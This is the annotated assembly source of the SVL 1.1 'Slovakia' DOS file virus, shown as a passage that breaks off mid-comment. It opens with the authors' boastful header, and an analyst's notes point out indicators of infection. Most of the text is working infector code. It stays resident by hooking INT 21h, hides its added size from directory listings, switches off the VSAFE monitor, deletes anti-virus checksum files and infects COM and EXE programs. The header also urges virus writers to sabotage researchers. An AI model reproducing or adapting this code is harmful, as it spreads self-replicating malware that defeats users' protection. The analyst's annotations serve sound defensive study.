;*********************************************************************** ;***** BEFORE READING THE SOURCE OR COMPILING , READ THIS !!! ********** ;*********************************************************************** ; THIS VIRUS WAS WRITTEN IN 12/93 - 1/94 SO DON'T BE SUPRISED, IF IT'S ; DETECTED BY ALL OF THE BETTER AV-PROGRAMS. THE SVL 1.x FAMILY OF VIRUSES ; WERE ( AND STILL ARE ) IN THE WILD. VX HAS A GOOD POLYMORPHIC ENGINE , ; SIMPLE SEMI-STEALTH, BUT IS RATHER POORLY OPTIMISED :( ; NAME : SVL 1.1 ; FAMILY MEMBERS : SVL 1.0 ; SVL 1.1 ... was the bugfix for 1.0 ; SVL 1.2 ... i can't remember what was new here ; SVL.KILL ... this isn't our work, this version ; rewrites sectors of HD at random ; ALIASES : SlovakiaII , New_Slovakia ; AUTHORS : JX , proffesor , mengele - members of SVL ; ORIGIN : .sk aka Slovakia aka Slovak republic ; RELEASED : Jan , 1994 ; REFERENCES : AVPVE links this virus as SlovakiaII to the Slovak family. ; That's wrong, of course :) . Another AVPVE mistake is ; saying that virus contains strings like 'SlovakiaII.3584a' ; and 'SlovakiaII.3584b' . I am sure there are no such ; strings in the sources . It looks like somebody tried to ; recompile sources which we released to our friends. ; TYPE : - resident COM & EXE infector ; - infection on exe ; - int 21 hooked ; - semi-stealth ; - prints fake message ; REMOVAL METHODS : various , e.g. formating HD, but our choice is ; to ftp to ftp.elf.stuba.sk /pub/pc/sac/svl.zip , ; where u can get a nice remover. ; POSTDISCOVERY HISTORY : after beeing in the wild for 11 months, we ; decided to show our goodwill to the AV-boyz ; and send them sources, but as they ; should have work very hard for their money, ; they got no disc or e-mail with the source. They ; got the sources printed on paper . :))))) ; Just imagine the situation : u have to re-type ; 30 pages. I think they were very happy ! ; I wish I could have seen their faces as they opened ; our special 'delivery'. 
; We also added a letter
; which can u find in VLAD#4 in article called
; Slovakia by Qark.
; WE STRONGLY RECCOMEND THE STRATEGY DESCRIBED ABOVE FOR DRIVING SOME VIRUS
; RESEARCHERS MAD. IF YOUR VIRUS HAS HUGE SOURCES, TRY IT. TRY TO INCLUDE
; SOME BUGS IN SUCH SPECIAL SOURCES. MAKE THE AV TYPE IT !!!
; THEY'LL BE HAPPY !!!
; Gretings to : VYVOJAR , _COKE_ , SEPULTURA , KDKD , TUIR , MMIR , MJunkie
; DARKMAN , QARK , METABOLIS , VLAD , IR and all from #v
; and to our favourite FRED FLINTSTONE
; special greetings to PFC fredey - army is cool , or isn't it ? :)))
; / now u have time to code this promised 'super perfect mega virus ' /
; (translated from Slovak:) With this I send special greetings to Miro Trnka
; and wish him that his column lasts until retirement age. He is slowly
; becoming a cult figure in Slovakia and a few people probably want to start
; a fan club for him. I ask Mr. Hubinsky to point these few sentences out
; to M.T. ... he - he - he
; /MSG Blesk gimme know where're u , or mail us .
; As information should be free , we'll welcome all kind of them ...
; Do not allow the net censorship !!!
; JX/SVL MGL / SVL proffesor/SVL and freshman blesk/SVL
; P.S : Don't PaniX !!!!!!!!!!!!!!!!!!!
;
;------------------------- cut here ---------------------------------------
; NOTE(analysis): everything below is the listing itself, TASM/MASM-style
; 16-bit DOS code. It depends on four include files (named at the very end
; of the listing) that are not part of this page, so several routines called
; below (FINDSTR, ANLPATH, MDEVICE, CHKASCIIZ) can only be described from
; how their results are used here.
.model tiny
.286
.code
; NOTE(analysis): first-generation carrier stub - prints the '$'-terminated
; string at LLL1 ("I") with INT 21h/AH=09h and terminates with AH=4Ch.
          mov ah,9h                     ; Carrier file
          push cs
          pop ds
          mov dx,offset LLL1
          int 21h
          mov ah,4ch
          int 21h
LLL1:     db "I$"
;***************************************************************************
; NOTE(analysis): decryptor template. It XORs AX words starting at CS:BX with
; the key in CX. With the values in this listing (count 1, key 0000h) the XOR
; leaves memory unchanged. The infection code later in the file obtains a
; per-copy decryptor from MDEVICE instead - presumably this template is only
; the carrier's placeholder; confirm against MDEVICE.inc.
DECST:    mov ax,1h                     ;Decryptor
          mov bx,20h
DEC1:     mov cx,0000h
          xor word ptr cs:[bx+0],cx
          inc bx
          inc bx
          dec ax
          jnz DEC1
;***************************************************************************
; NOTE(analysis): the immediate of `mov si,0020h` is overwritten for every
; infected file (the infection path stores a word at START+1h), so SI holds
; the run-time offset of START and all later data references are SI-relative.
; DI = SI+13h is used a few instructions later as the target of a one-byte
; self-modifying write.
START:    mov si,0020h                  ; Flexible entry point
          mov di,si                     ; SI holds offset of START.
          add di,13h
          push ds                       ; Store segments
          push es
          push cs                       ;DS=CS.
; NOTE(analysis): loader, continued (DS is being set to CS here).
; Control goes to TRACE1 (a short delay loop at the end of the listing) and
; comes back to AAAY, which writes 0 to the byte at START+13h. Counting the
; instruction encodings, that byte looks like the displacement of the jump at
; AAAX (the infection path sets AAAX+1h to 04h). With a zero displacement the
; jump would fall into the AH=4Ch terminate call below - this appears to be a
; prefetch-queue anti-tracing check; confirm on the assembled binary.
          pop ds
          jmp TRACE1
AAAY:     mov byte ptr ds:[di],0h
AAAX:     jmp INST1
;---------------------------------
          mov ah,4ch
          int 21h
;---------------------------------
; NOTE(analysis): payload trigger. INT 1Ah/AH=04h returns the RTC date in BCD
; (DH=month, DL=day). The code requires DH=01h and DL<03h, i.e. 1-2 January;
; the author's "(1-4.8)" remark does not match the compares. When triggered it
; prints INSTTXT1, hides the cursor (INT 10h/AH=01h, CH=20h) and waits via
; INT 15h/AH=86h. The message text is a usable on-screen indicator.
INST1:    mov ah,04h                    ; Display message on screen (1-4.8)
          int 1ah
          cmp dh,01h
          jnz INST2
          cmp dl,3h
          jnc INST2
          mov dx,si
          add dx,offset INSTTXT1-offset START
          mov ah,09h
          int 21h
          mov ah,01h                    ; Clear cursor
          mov ch,20h
          int 10h
          mov ah,86h                    ; wait for a while
          mov cx,0020h
          mov dx,0fffh
          int 15h
INST2:
;---------------------------------
          cmp byte ptr ds:[si+TYPFILE-START],2h ; COM or EXE file ?
          jnz INST2C
;---------------------------------
; NOTE(analysis): EXE host - rebuild the original entry point. ES is the PSP
; segment on entry, so ES+10h is the load segment; the zero immediates at
; NNCS and NNSS are patched at infection time with the host header's
; relative CS and SS.
          mov ax,es                     ; calculate segment for EXE file
          add ax,10h
          push ax
NNCS:     add ax,0000h                  ; add REL_CS, from original EXE header.
          mov word ptr ds:[si+JMPCS-START],ax ; prepare jump to original
          pop ax                        ; entry point
NNSS:     add ax,0000h                  ; add REL_SS, from original EXE header.
          mov word ptr ds:[si+INSTSS-START+1h],ax ;restore STACK segment
          jmp INSTZV
;---------------------------------
; NOTE(analysis): COM host - the far jump target becomes CS:0100h and the
; three saved bytes at ZACCOM are copied back over the start of the host.
INST2C:   mov ax,cs
          mov word ptr ds:[si+JMPCS-START],ax
          mov word ptr ds:[si+JMPIP-START],100h
          push si
          cld
          mov cx,3h
          mov di,100h
          add si,offset ZACCOM-START
          rep movsb
          pop si
;---------------------------------
INSTZV:   mov ah,30h                    ; get DOS version
          int 21h
          cmp al,4h                     ; we dont go resident
          jnc INST4                     ; if dos version is below 4.0
          jmp INSTEND
;---------------------------------
; NOTE(analysis): residency check. INT 21h/AH=54h with CX=4321h answered with
; BX=0EEE1h means a copy is already resident (the resident handler implements
; the reply). This call/response pair is a simple memory-detection signature.
INST4:    mov cx,4321h
          mov ah,54h                    ; Installation check
          int 21h
          cmp bx,0EEE1h
          jnz INST5
          jmp INSTEND
;---------------------------------
; NOTE(analysis): ES-1 is the host's memory control block; type byte 5Ah
; ('Z') marks the last block in the chain. Installation only continues then.
INST5:    mov ax,es                     ;Test if program MCB is last
          dec ax
          mov es,ax
          cmp byte ptr es:[0000h],5ah
          jz INST6
          jmp INSTEND
;---------------------------------
INST6:    mov bx,word ptr es:[0003h]    ; calculate where we place virus
          sub bx,100h                   ; from MCB.
          mov dx,es
          add dx,bx
          inc dx
;---------------------------------
          mov ax,cs                     ; do we have enough memory ?
          cmp byte ptr ds:[si+TYPFILE-START],2h ; COM or EXE file.
          jnz INST7
          add ax,0101h                  ; add our size in para +1.
; NOTE(analysis): memory installation, continued. AX is the lowest segment the
; host still needs, DX the segment chosen for the resident copy.
NNMIN:    add ax,0000h                  ; add MINMEM from EXE-FILE header
          jmp INST8
INST7:    add ax,1000h
INST8:    cmp dx,ax
          jc INSTEND
;---------------------------------
; NOTE(analysis): shrinks the last MCB and the PSP's top-of-memory word
; (PSP:0002h) by 100h paragraphs = 4 KiB.
          mov word ptr es:[0003h],bx    ; cut MCB by 4kB.
          mov ax,es
          inc ax
          mov es,ax
          mov ax,word ptr es:[0002h]
          sub ax,100h
          mov word ptr es:[0002h],ax
;---------------------------------
; NOTE(analysis): copies 0E00h (3584) bytes starting at START to offset 0 of
; the new segment. That is why resident code addresses everything as
; <label>-START.
          push si                       ; move body to the top of memory in VIRSEG.
          mov cx,0e00h
          push cs
          pop ds
          mov es,dx                     ; ES holds VIRSEG.
          xor di,di
          rep movsb
          pop si
;---------------------------------
; NOTE(analysis): two memory-resident indicators are produced here:
;  - the BIOS base-memory word at 0000:0413h drops by 4 (KiB);
;  - the INT 21h vector (0000:0084h) is rewritten directly in the interrupt
;    table to VIRSEG:(SIZESTE-START); the previous vector is kept in HPVECT21.
          xor ax,ax
          mov ds,ax
          sub word ptr ds:[413h],4h     ;subtract BIOSMEMSIZE by 4..
          mov ax,word ptr ds:[21h*4h]   ;hook INT 21h
          mov word ptr es:[HPVECT21-START],ax
          mov ax,word ptr ds:[21h*4h+2h]
          mov word ptr es:[HPVECT21-START+2h],ax
          mov ax,es
          cli
          mov word ptr ds:[21h*4h],offset SIZESTE-START
          mov word ptr ds:[21h*4h+2h],ax
          sti
;---------------------------------
INSTEND:  xor ax,ax                     ;prepare register for exec.
          xor bx,bx
          xor cx,cx
          xor dx,dx
          xor bp,bp
          xor di,di
          cmp byte ptr cs:[si+TYPFILE-START],2h ;COM or EXE file.
          jnz INSTENDC
;---------------------------------
; NOTE(analysis): EXE exit path. The immediates at INSTSP/INSTSS and the four
; bytes after the 0EAh opcode (far JMP) at JMINS are patched data: they carry
; the host's original SS:SP and CS:IP.
          xor si,si
          pop es
          pop ds
          sahf
          cli
INSTSP:   mov sp,0000h                  ;Set original stack.
INSTSS:   mov ax,0000h                  ;for EXE file.
          mov ss,ax
          sti
          xor ax,ax
JMINS:    db 0eah                       ;Leave virus loader.
JMPIP:    db 00h
          db 00h
JMPCS:    db 00h
          db 00h
;--------------------------------
INSTENDC:xor si,si                      ; start original COM file.
          pop es                        ; restore segments pointing to PSP.
          pop ds
          sahf                          ; clear FLAGs.
          jmp JMINS                     ; and exit from here
;--------------------------------
HPVECT21:dw 0h                          ;INT 21h
          dw 0h
INSTTXT1: db 0dh,0ah,"I'am SLOVAKIA virus Version 1.2 Copyright"
          db " (c) 1994 SVL",0dh,0ah,"$"
TYPFILE:  db 2h                         ; type of the file carrying the virus (0 - command interpreter, 1 - COM, 2 - EXE) [translated from Slovak]
ZACCOM:   db 0h,0h,0h                   ; bytes from the start of the original COM file [translated from Slovak]
;****************************************************************************
; NOTE(analysis): working storage used by the resident INT 21h handler.
REGDX:    dw 0h                         ; offset of path to file (fn. EXEC).
REGDS:    dw 0h                         ; segment of path to file (fn. EXEC).
NUMBDSK:  db 0h                         ; drive number
IDFILE:   db 0h                         ; file identifier (0,1-COM,2-EXE).
; NOTE(analysis): remaining working storage, then the resident INT 21h handler.
PARAMVS:  db 0h                         ; VSAFE parameters
AKTHNDL:  dw 0h                         ; handle of opened file
TIMEHP:   dw 0h                         ; here we store time
DATEHP:   dw 0h                         ; date of victim
TABHEAD:  db 1ch dup(0)                 ;where exe file header 'll be
SIZESEG:  dw 0h                         ; filesize (DX*65536)+AX.
SIZEOFF:  dw 0h                         ; AX
ATR:      dw 0h                         ; attributes
; NOTE(analysis): file names the handler acts on. DTX1-DTX3 are deleted from
; the directory of every program it processes; DTX4 is the temporary name the
; target is renamed to while it is modified. All four are file-system
; indicators.
DTX1:     db "chklist.ms ",0h
DTX2:     db "chklist.cps",0h
DTX3:     db "smartchk.cps",0h
DTX4:     db "svl.svl",0h
ASIZEVIR:dw 0h                          ; counter for write
CODETP:   db 0h                         ; type of decryption
NCDX:     dw 0h                         ; decryption key
STEASZAX:dw 0h                          ; file size
STEASZDX:dw 0h                          ; file size
;rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
; NOTE(analysis): INT 21h entry. After PUSHF+PUSHA the caller's FLAGS word
; from the interrupt frame sits at [BP+22]. Bit 9 (IF) decides which opcode
; byte is written into FLEG1..FLEG4: 0FBh (STI) or 0FAh (CLI). The handler's
; exits use RETF 2, which discards the saved flags, so this self-modification
; is how the caller's interrupt-enable state is reproduced.
SIZESTE:  pushf                         ; Start of resident part
;--------------------------
          pusha
          mov bp,sp
          mov ax,word ptr ss:[bp+22d]
          test ax,0000001000000000b
          jz OBNIF
          mov bh,0fbh
          jmp OBNIF1
OBNIF:    mov bh,0fah
OBNIF1:   mov byte ptr cs:[FLEG1-START],bh
          mov byte ptr cs:[FLEG2-START],bh
          mov byte ptr cs:[FLEG3-START],bh
          mov byte ptr cs:[FLEG4-START],bh
          popa
;--------------------------
          cmp ah,4eh
          jz SI1ST
          cmp ah,4fh
          jnz SIA
;-------------------------------------------------------------------------
; NOTE(analysis): size stealth for FindFirst/FindNext (AH=4Eh/4Fh). The real
; call is made first; in the returned DTA the date word is at +18h and the
; 32-bit size at +1Ah. A year field >= 64h (100, i.e. a date of 2080 or later)
; is the infection marker; for such entries 0E00h (3584) is subtracted from
; the reported size.
SI1ST:    popf                          ;handle int 21h FIND 1st FILE, FIND nxt FILE
          pushf                         ;via handle( fn. 4e, 4f. )
          call dword ptr cs:[HPVECT21-START]
          pushf
          pusha
          push es
          jc SI1STE
;-------------------------
          mov ah,2fh                    ;INT 21h fn. 2fh GET DTA.
          pushf
          call dword ptr cs:[HPVECT21-START]
          mov ax,word ptr es:[bx+18h]
          shr ax,9h                     ; AX holds year
          cmp ax,64h                    ; is infected ?
          jc SI1STE
;--------------------------
          mov ax,0e00h                  ; sizefile-ax.
          sub word ptr es:[bx+1ah],ax   ;
          jnc SI1ST2                    ; hide virus ...
; NOTE(analysis): tail of the FindFirst/FindNext size adjustment - borrow into
; the high word of the 32-bit size, then leave through FLEG1.
          dec word ptr es:[bx+1ah+2h]
SI1ST2:   jmp SI1STE
;--------------------------
SI1STE:   pop es
          popa
          popf
FLEG1:    sti
          retf 02
;-------------------------------------------------------------------------
SIA:      cmp ah,11h
          jz SIFC
          cmp ah,12h
          jnz SIEND
;-------------------------------------------------------------------------
; NOTE(analysis): the same size stealth for the FCB searches (AH=11h/12h).
; An extended FCB result starts with 0FFh and carries a 7-byte prefix that is
; skipped; the date word is then read at +19h and the size at +1Dh.
SIFC:     popf                          ; handle INT 21h, FN 11H, 12h FND FILE FCB
          pushf
          call dword ptr cs:[HPVECT21-START]
          pushf
          pusha
          push es
          cmp al,0h
          jnz SIFCE                     ; error !
;-----------------------
          mov ah,2fh                    ; get DTA.
          pushf
          call dword ptr cs:[HPVECT21-START]
          cmp byte ptr es:[bx],0ffh     ;is FCB extended ?
          jz SIFC1
;-----------------------
SIFC3:    mov ax,word ptr es:[bx+19h]   ; is date changed ?
          shr ax,9h                     ; Normal FCB.
          cmp ax,64h
          jc SIFCE
          mov ax,0e00h                  ; hide virus
          sub word ptr es:[bx+1dh],ax
          jnc SIFC2                     ; cut size by ax bytes
          dec word ptr es:[bx+1dh+2h]
SIFC2:    jmp SIFCE
;-----------------------
SIFC1:    add bx,7h                     ; FCB is extended , skip garbage
          jmp SIFC3
;-----------------------
SIFCE:    pop es
          popa
          popf
FLEG2:    sti
          retf 02
;-------------------------------------------------------------------------
; NOTE(analysis): resident side of the installation check: AH=54h with
; CX=4321h is passed to DOS and then answered with BX=0EEE1h.
SIEND:    cmp ah,54h                    ; installation check
          jnz SIEND1
          cmp cx,4321h
          jnz SIEND1
          popf
          pushf
          call dword ptr cs:[HPVECT21-START]
          mov bx,0eee1h
FLEG3:    sti
          retf 02
;-------------------------------------------------------------------------
;-------------------------------------------------------------------------
; NOTE(analysis): infection trigger is EXEC, AX=4B00h (load and execute) only.
; DS:DX is the ASCIIZ path of the program being started; it is saved in
; REGDS:REGDX for the rest of the routine.
SIEND1:   cmp ah,4bh                    ; fn EXEC.
          jz ZAV0                       ; here we infect files
          jmp SIEND2
ZAV0:     cmp al,00h
          jz ZAV1
          jmp SIEND2
;---------------------
ZAV1:     pusha
          push ds
          push es
;---------------------
          mov word ptr cs:[REGDX-START],dx ; store path to file
          mov word ptr cs:[REGDS-START],ds ; (fn. EXEC)
;-------------------------------------------------------------------------
          mov bx,dx                     ; test , what drive is it
          push ds                       ; we infects only local HDs.
          push dx
          mov dl,byte ptr ds:[bx]
          mov dh,byte ptr ds:[bx+1h]
          cmp dh,3ah                    ; contains path drive letter ?
; (d:)   <- tail of the author's comment on the preceding `cmp dh,3ah`:
;           is the second character of the path a ':' ?
; NOTE(analysis): target-drive filter. The 1-based drive number comes either
; from the path's drive letter (upper or lower case) or from the current drive
; (AH=19h). A drive is accepted only if AH=1Ch reports media ID byte 0F8h
; (fixed disk) and AX=4409h reports it as not remote (DX bit 12 clear).
; Result is passed in CF: set = acceptable.
          jz ZAV2
;---------------------
          mov ah,19h                    ; get current drive
          pushf
          call dword ptr cs:[HPVECT21-START]
          inc al
          mov dl,al
          jmp ZAV4
;---------------------
ZAV2:     cmp dl,60h                    ; calculate drive number from ASCII
          jnc ZAV3
          sub dl,40h
          jmp ZAV4
ZAV3:     sub dl,60h
;---------------------
ZAV4:     mov byte ptr cs:[NUMBDSK-START],dl ; store drive number
          mov ah,1ch                    ; HD or FD ?
          pushf
          call dword ptr cs:[HPVECT21-START]
          cmp al,0ffh                   ; error ?
          jz ZAV444
          cmp byte ptr ds:[bx],0f8h     ;Test ID byte of disk FAT (F8-HD).
          jnz ZAV444
;---------------------
          mov bl,byte ptr cs:[NUMBDSK-START] ; is drive local ?
          mov ax,4409h
          pushf
          call dword ptr cs:[HPVECT21-START]
          jc ZAV444
          test dx,1000h
          jnz ZAV444
;---------------------
          stc                           ;Disk is ok :)
          jmp ZAV444E
;---------------------
ZAV444:   clc                           ; wrong drive :(
ZAV444E:  pop dx
          pop ds
;-------------------------------------------------------------------------
          jc ZAV5
          jmp ZAVE
;---------------------
; NOTE(analysis): AH=62h returns the current PSP segment in BX; BX-1 is its
; MCB, and offset 08h of an MCB holds the owner's program name on DOS 4+.
; FINDSTR is defined in an include that is not on this page - presumably it
; matches that name against a list of anti-virus programs and returns CF set
; on a match; confirm against FINDSTR.inc.
ZAV5:     mov ah,62h                    ; test if actual process is AV
          pushf
          call dword ptr cs:[HPVECT21-START]
          dec bx
          push ds
          mov ds,bx
          mov si,08h
          call FINDSTR
          pop ds
          jnc ZAV6
          jmp ZAVE
;---------------------
; NOTE(analysis): CHKASCIIZ is not defined in the visible part of the file.
; From its use here: CF set = skip the file, ZF set = EXE, ZF clear = COM.
ZAV6:     call CHKASCIIZ                ;Test if file (path ds:dx) is COM or EXE
          jnc ZAV7                      ; and if is AV or not
          jmp ZAVE
ZAV7:     jz ZAV8                       ; set identifier for actual file
          mov byte ptr cs:[IDFILE-START],1h
          jmp ZAV9
ZAV8:     mov byte ptr cs:[IDFILE-START],2h
;---------------------
; NOTE(analysis): INT 21h AX=0FA02h, DX=5945h is the VSAFE "set options"
; interface of the MS-DOS 6 resident monitor: BL=0 clears every protection
; flag and the previous flags come back in CL (saved to PARAMVS and restored
; at ZAVEVSF). A monitor whose options are switched off around each program
; launch is a behavioural indicator.
ZAV9:     push ds                       ; fuck VSAFE (Msdos 6.0).
          push dx
          mov ax,0fa02h
          mov dx,5945h
          mov bl,0h
          int 21h
          mov byte ptr cs:[PARAMVS-START],cl
          pop dx
          pop ds
;---------------------
          mov ax,4300h                  ; getfile attribs
          pushf
          call dword ptr cs:[HPVECT21-START]
          jnc ZAV9A
          jmp ZAVEVSF
ZAV9A:    mov word ptr cs:[ATR-START],cx
;---------------------
          mov ax,3d00h                  ;open file (Read only).
; just check it   <- tail of the author's comment on the read-only open that
;                    was set up just before this point
; NOTE(analysis): pre-infection checks on the opened file. Every failure path
; goes to ZAVECHNDL (close the handle, restore VSAFE, pass the EXEC through).
          pushf
          call dword ptr cs:[HPVECT21-START]
          jnc ZAV10
          jmp ZAVEVSF
;---------------------
; NOTE(analysis): the file's time/date are saved, and a date whose year field
; is already >= 64h marks the file as infected - it is skipped.
ZAV10:    mov bx,ax                     ; get date
          mov word ptr cs:[AKTHNDL-START],bx
          mov ax,5700h
          pushf
          call dword ptr cs:[HPVECT21-START]
          jnc ZAV11
          jmp ZAVECHNDL
ZAV11:    mov word ptr cs:[TIMEHP-START],cx ;and store date & time.
          mov word ptr cs:[DATEHP-START],dx
          shr dx,9h                     ; is file infected (date is +100 years ).
          cmp dx,64h
          jc ZAV12
          jmp ZAVECHNDL
;---------------------
ZAV12:    mov ah,3fh                    ;get 1Ch bytes from file start
          push cs
          pop ds
          mov cx,1ch
          mov dx,offset TABHEAD-START
          pushf
          call dword ptr ds:[HPVECT21-START]
          jnc ZAV13
          jmp ZAVECHNDL
;---------------------
ZAV13:    mov ax,4202h                  ; get length
          xor cx,cx
          xor dx,dx
          pushf
          call dword ptr ds:[HPVECT21-START]
          jnc ZAV14
          jmp ZAVECHNDL
;----------------------
; NOTE(analysis): size limits - files shorter than 400h bytes are skipped;
; COM files must be below 0EFF0h bytes, EXE files must have a high size word
; below 7.
ZAV14:    mov word ptr ds:[SIZESEG-START],dx ; store length
          mov word ptr ds:[SIZEOFF-START],ax
          cmp dx,0h                     ; isn't file too short ?
          jnz ZAV15
          cmp ax,400h
          jnc ZAV15
          jmp ZAVECHNDL
ZAV15:    cmp byte ptr ds:[IDFILE-START],2h ; or too long ?
          jz ZAV17
          cmp ax,0eff0h                 ; COM size check
          jc ZAV18
          jmp ZAVECHNDL
ZAV17:    cmp dx,7h                     ; EXE size check
          jc ZAV16
          jmp ZAVECHNDL
; NOTE(analysis): converts the real file size to 512-byte pages (rounded up)
; and compares it with the page count at header offset 04h. A mismatch (for
; example a file with data appended after the load image) means the file is
; left alone.
ZAV16:    push bx
          push ax
          mov cx,dx                     ; match EXE file size in header with
          mov ax,80h                    ; real size ?
          xor dx,dx
          mul cx
          mov bx,ax
          pop ax
          mov cx,200h
          xor dx,dx
          div word ptr cx
          xor dx,0h
          jz ZAV16A
          inc ax
ZAV16A:   add ax,bx
          cmp word ptr ds:[TABHEAD-START+4h],ax
          pop bx
          jz ZAV18
          jmp ZAVECHNDL
;---------------------
; NOTE(analysis): header offset 18h is the relocation-table offset; a value of
; 40h or more is taken as a sign of a new-format (Windows) executable, which
; is skipped.
ZAV18:    cmp byte ptr ds:[IDFILE-START],2h ; is EXE file for
          jnz ZAV19                     ; macrosoft fensters ? (MSWIN)
          mov si,offset TABHEAD-START
          cmp word ptr ds:[si+18h],40h
          jc ZAV19
          jmp ZAVECHNDL
;---------------------
ZAV19:    mov ah,3eh                    ; close file
          pushf
          call dword ptr ds:[HPVECT21-START]
          jnc ZAV20
          jmp ZAVECHNDL
;----------------------------------------------------------------------
; NOTE(analysis): ANLPATH is defined in an include that is not on this page.
; From its use: it appears to leave the directory part of the EXEC path in
; the scratch buffer at offset 0E00h of the resident segment and return the
; append position in SI - confirm against ANLPATH.inc.
ZAV20:    call ANLPATH                  ; delete unfriendly files (CPAV,MSAV).
          push cs                       ;chklist.ms .
; NOTE(analysis): removal of integrity-checker databases. For each of DTX1,
; DTX2 and DTX3 (chklist.ms, chklist.cps, smartchk.cps) 0Fh bytes of the name
; are appended at the position returned by ANLPATH and ZAV20PRC issues
; INT 21h/AH=41h (delete) on the buffer at 0E00h. Checksum files that vanish
; from directories of programs that were run is a strong host indicator.
          pop ds
          mov di,si
          mov si,offset DTX1-START
          mov cx,0fh
          rep movsb
          call ZAV20PRC
;---------------------
          call ANLPATH
          push cs                       ;chklist.cps
          pop ds
          mov di,si
          mov si,offset DTX2-START
          mov cx,0fh
          rep movsb
          call ZAV20PRC
;---------------------
          call ANLPATH                  ;smartchk.cps.
          push cs
          pop ds
          mov di,si
          mov si,offset DTX3-START
          mov cx,0fh
          rep movsb
          call ZAV20PRC
          jmp ZAV21
;---------------------
ZAV20PRC: mov ah,41h                    ; i love this function
          mov dx,0e00h
          pushf
          call dword ptr cs:[HPVECT21-START]
          ret
;----------------------------------------------------------------------
;----------------------------------------------------------------------
; NOTE(analysis): attributes of the target are cleared (AX=4301h, CX=0); the
; original value saved in ATR is written back at ZAVRENM.
ZAV21:    mov ds,word ptr cs:[REGDS-START] ; normal attribs
          mov dx,word ptr cs:[REGDX-START]
          mov ax,4301h
          mov cx,0h
          pushf
          call dword ptr cs:[HPVECT21-START]
          jnc ZAV22
          jmp ZAVEVSF
;---------------------
; NOTE(analysis): the target is renamed (AH=56h) to "svl.svl" in its own
; directory before it is opened for writing, presumably so that monitors
; keyed on .COM/.EXE names do not see the write. A transient svl.svl file is
; a file-system indicator; if the machine stops mid-operation the program
; would be left under that name.
ZAV22:    call ANLPATH                  ; rename exe,com FILE to
          push cs                       ;SVL.svl
          pop ds
          mov di,si
          mov si,offset DTX4-START
          mov cx,0fh
          rep movsb
          mov ds,word ptr cs:[REGDS-START]
          mov di,0e00h
          mov ah,56h
          pushf
          call dword ptr cs:[HPVECT21-START]
          jnc ZAV23
          jmp ZAVEVSF
;---------------------
ZAV23:    push cs                       ; open file R/w
          pop ds
          mov dx,0e00h
          mov ax,3d02h
          pushf
          call dword ptr cs:[HPVECT21-START]
          jnc ZAV24
          jmp ZAVRENM
;---------------------
ZAV24:    mov bx,ax
          mov word ptr cs:[AKTHNDL-START],bx
          push cs
          pop ds
          mov ah,byte ptr ds:[IDFILE-START] ; get identifier
          mov byte ptr ds:[TYPFILE-START],ah
          cmp byte ptr ds:[IDFILE-START],2h ; COM or EXE file.
          jz ZAV24XX
          jmp ZAV25
;---------------------
; NOTE(analysis): EXE case. The host's original entry values are copied from
; the header image in TABHEAD (IP at +14h, CS at +16h, SP at +10h, SS at +0Eh)
; into the operand bytes of the loader instructions that restore them. These
; are the values a disinfector has to recover from the decrypted body.
ZAV24XX:  mov ax,word ptr ds:[TABHEAD+14h-START] ; save IP.
          mov word ptr ds:[JMPIP-START],ax
          mov ax,word ptr ds:[TABHEAD+16h-START] ; save CS.
          mov word ptr ds:[NNCS+1h-START],ax
          mov ax,word ptr ds:[TABHEAD+10h-START] ; save SP.
          mov word ptr ds:[INSTSP+1h-START],ax
          mov ax,word ptr ds:[TABHEAD+0eh-START] ; save SS.
          mov word ptr ds:[NNSS+1h-START],ax
;---------------------
          mov cx,word ptr ds:[TABHEAD+8h-START] ; calculate new REL_CS,IP.
; NOTE(analysis): EXE header rewrite, continued. CX was loaded with the header
; size in paragraphs (header offset 08h); the code computes file size minus
; header size as a 32-bit value and converts it to a segment:offset pair.
          shl cx,4h                     ; CX= header size
          mov ax,word ptr ds:[SIZEOFF-START] ; file size
          mov dx,word ptr ds:[SIZESEG-START]
          cmp ax,cx
          jz ZAV25B
          jnc ZAV25C
          sub cx,ax
          mov ax,0ffffh
          sub ax,cx
          inc ax
          dec dx
          jmp ZAV25E
ZAV25B:   xor ax,ax
          jmp ZAV25E
ZAV25C:   sub ax,cx
;---------------------
ZAV25E:   push ax                       ; ax+dx*(65536) is EXE size
          mov cx,dx                     ; get REL_CS,IP.
          xor dx,dx
          mov ax,1000h
          mul cx
          mov bx,ax
          pop ax
          xor dx,dx
          mov cx,10h
          div word ptr cx
          add ax,bx
;---------------------
; NOTE(analysis): header fields changed in an infected EXE, useful for
; static triage: CS (+16h) and SS (+0Eh) are set to the same segment, SP
; (+10h) is always 1200h, MINALLOC (+0Ah) grows by 70h paragraphs, MAXALLOC
; (+0Ch) becomes 0FFFFh, the checksum (+12h) is zeroed and the page count
; (+04h) grows by 7 (7 * 512 = 3584 bytes).
          mov word ptr ds:[TABHEAD+16h-START],ax ; EXE header new REL_CS.
          mov word ptr ds:[TABHEAD+0eh-START],ax ; header new REL_SS.
          mov word ptr ds:[TABHEAD+14h-START],dx ; header new IP.
          mov word ptr ds:[TABHEAD+10h-START],1200h ; new SP.
;---------------------
          mov ax,word ptr ds:[TABHEAD+0ah-START] ; handle MINMEM and MAXMEM.
          add ax,70h
          mov word ptr ds:[TABHEAD+0ah-START],ax
          mov word ptr ds:[TABHEAD+0ch-START],0ffffh
;---------------------
ZAV25K:   mov word ptr ds:[NNMIN+1h-START],ax
          mov word ptr ds:[TABHEAD+12h-START],0h ; clear checksum
          mov ax,word ptr ds:[TABHEAD+4h-START] ; add virus size
          add ax,7h                     ; in pages
          mov word ptr ds:[TABHEAD+4h-START],ax
          jmp ZAV26
;---------------------
; NOTE(analysis): COM case. The host's first three bytes are saved in ZACCOM
; and replaced by 0E9h (near JMP) with displacement size-3, i.e. a jump to the
; original end of file. DX = size+100h is the in-memory offset of the appended
; code.
ZAV25:    mov cx,3h                     ; store first 3 bytes from COM
          mov si,offset TABHEAD-START
          push cs
          pop es
          mov di,offset ZACCOM-START
          rep movsb
          mov ax,word ptr ds:[SIZEOFF-START] ; jump parameters
          push ax
          add ax,100h
          mov dx,ax
          pop ax
          sub ax,3h
          mov byte ptr ds:[TABHEAD-START],0e9h
          mov word ptr ds:[TABHEAD+1h-START],ax
;---------------------
; NOTE(analysis): MDEVICE is the decryptor generator from an include that is
; not on this page. It is called with AX = entry offset, CX = 1600 and
; DX = 0E00h (the scratch buffer). Judging by the stores that follow, it
; returns the cipher type in BH, the generated decryptor's length in AX and
; the key in CX - confirm against MDEVICE.inc. Because the decryptor differs
